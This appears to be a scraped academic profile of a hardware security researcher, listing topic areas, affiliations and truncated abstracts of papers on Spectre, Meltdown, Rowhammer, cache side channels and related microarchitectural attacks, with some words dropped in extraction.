A5066874310- Security and Verification in Computing
- Advanced Malware Detection Techniques
- Cloud Data Security Solutions
- Physical Unclonable Functions (PUFs) and Hardware Security
- Network Security and Intrusion Detection
- Cryptographic Implementations and Security
- Parallel Computing and Optimization Techniques
- Diamond and Carbon-based Materials Research
- Distributed systems and fault tolerance
- Advanced Memory and Neural Computing
- Digital and Cyber Forensics
- Semiconductor materials and devices
- User Authentication and Security Systems
- Internet Traffic Analysis and Secure E-voting
- Radiation Effects in Electronics
- Advanced Data Storage Technologies
- Adversarial Robustness in Machine Learning
- Web Application Security Vulnerabilities
- Low-power high-performance VLSI design
- Smart Grid Security and Resilience
- Pharmacological Receptor Mechanisms and Effects
- Access Control and Trust
- Marine Toxins and Detection Methods
- Model-Driven Software Engineering Techniques
- Digital Media Forensic Detection
Graz University of Technology
2015-2024
Institut für Informationsverarbeitung
2018-2021
University of Michigan
2020
Microsoft Research (United Kingdom)
2017
Modern processors use branch prediction and speculative execution to maximize performance. For example, if the destination of a depends on memory value that is in process being read, CPUs will try guess attempt execute ahead. When finally arrives, CPU either discards or commits computation. Speculative logic unfaithful how it executes, can access victim's registers, perform operations with measurable side effects. Spectre attacks involve inducing victim speculatively would not occur during...
Recent work on cache attacks has shown that CPU caches represent a powerful source of information leakage. However, existing require manual identification vulnerabilities, i.e., data accesses or instruction execution depending secret information. In this paper, we present Cache Template Attacks. This generic attack technique allows us to profile and exploit cache-based leakage any program automatically, without prior knowledge specific software versions even system Attacks can be executed...
Recent work shows that the Rowhammer hardware bug can be used to craft powerful attacks and completely subvert a system. However, existing efforts either describe probabilistic (and thus unreliable) or rely on special often unavailable) memory management features place victim objects in vulnerable physical locations. Moreover, prior only targets x86 researchers have openly wondered whether other architectures, such as ARM, are even possible. We show deterministic feasible commodity mobile...
In early 2018, Meltdown first showed how to read arbitrary kernel memory from user space by exploiting side-effects transient instructions. While this attack has been mitigated through stronger isolation boundaries between and space, inspired an entirely new class of fault-driven transient-execution attacks. Particularly, over the past year, Meltdown-type attacks have extended not only leak data L1 cache but also various other microarchitectural structures, including FPU register file store buffer.
Dynamic frequency and voltage scaling features have been introduced to manage ever-growing heat power consumption in modern processors. Design restrictions ensure are adjusted as a pair, based on the current load, because for each there is only certain range where processor can operate correctly. For this purpose, many processors (including widespread Intel Core series) expose privileged software interfaces dynamically regulate operating voltage.In paper, we demonstrate that these be...
In the last 10 years, cache attacks on Intel x86 CPUs have gained increasing attention among scientific community and powerful techniques to exploit side channels been developed. However, modern smartphones use one or more multi-core ARM that a different organization instruction set than CPUs. So far, no cross-core demonstrated non-rooted Android smartphones. this work, we demonstrate how solve key challenges perform most Prime+Probe, Flush+Reload, Evict+Reload, Flush+Flush ARM-based devices...
Modern operating systems use hardware support to protect against control-flow hijacking attacks such as code-injection attacks. Typically, write access executable pages is prevented and kernel mode execution restricted code only. However, current CPUs provide no protection code-reuse like ROP. ASLR used prevent these by making all addresses unpredictable for an attacker. Hence, the security relies fundamentally on preventing address information. We introduce Prefetch Side-Channel Attacks, a...
The Rowhammer bug allows unauthorized modification of bits in DRAM cells from unprivileged software, enabling powerful privilege-escalation attacks. Sophisticated countermeasures have been presented, aiming at mitigating the or its exploitation. However, state art provides insufficient insight on completeness these defenses. In this paper, we present novel attack and exploitation primitives, showing that even a combination all defenses is ineffective. Our new technique, one-location...
Meltdown and Spectre enable arbitrary data leakage from memory via various side channels. Short-term software mitigations for are only a temporary solution with significant performance overhead. Due to hardware fixes, these disabled on recent processors. In this paper, we show that Meltdown-like attacks still possible CPUs which not vulnerable Meltdown. We identify two behaviors of the store buffer, microarchitectural resource reduce latency stores, powerful attacks. The first behavior,...
The recent Spectre attack first showed how to inject incorrect branch targets into a victim domain by poisoning microarchitectural prediction history. In this paper, we generalize injection-based methodologies the memory hierarchy directly injecting incorrect, attacker-controlled values victim's transient execution. We propose Load Value Injection (LVI) as an innovative technique reversely exploit Meltdown-type data leakage. LVI abuses that faulting or assisted loads, executed legitimate...
Lessons learned from Meltdown's exploitation of the weaknesses in today's processors.
Power side-channel attacks exploit variations in power consumption to extract secrets from a device, e.g., cryptographic keys. Prior typically required physical access the target device and specialized equipment such as probes high-resolution oscilloscope.In this paper, we present PLATYPUS attacks, which are novel software-based on Intel server, desktop, laptop CPUs. We unprivileged Running Average Limit (RAPL) interface that exposes values directly correlated with consumption, forming...
Covert channels evade isolation mechanisms between multiple parties in the cloud.Especially cache covert allow transmission of several hundred kilobits per second unprivileged user programs separate virtual machines.However, caches are small and shared thus cache-based communication is susceptible to noise from any system activity interrupts.The feasibility a reliable channel under severe scenario has not been demonstrated yet.Instead, previous work relies on either two contradicting...
Modern processors use branch prediction and speculative execution to maximize performance. For example, if the destination of a depends on memory value that is in process being read, CPUs will try guess attempt execute ahead. When finally arrives, CPU either discards or commits computation. Speculative logic unfaithful how it executes, can access victim's registers, perform operations with measurable side effects. Spectre attacks involve inducing victim speculatively would not occur during...
Research on transient execution attacks including Spectre and Meltdown showed that exception or branch misprediction events might leave secret-dependent traces in the CPU's microarchitectural state. This observation led to a proliferation of new attack variants even more ad-hoc defenses (e.g., microcode software patches). Both industry academia are now focusing finding effective for known issues. However, we only have limited insight residual surface completeness proposed defenses. In this...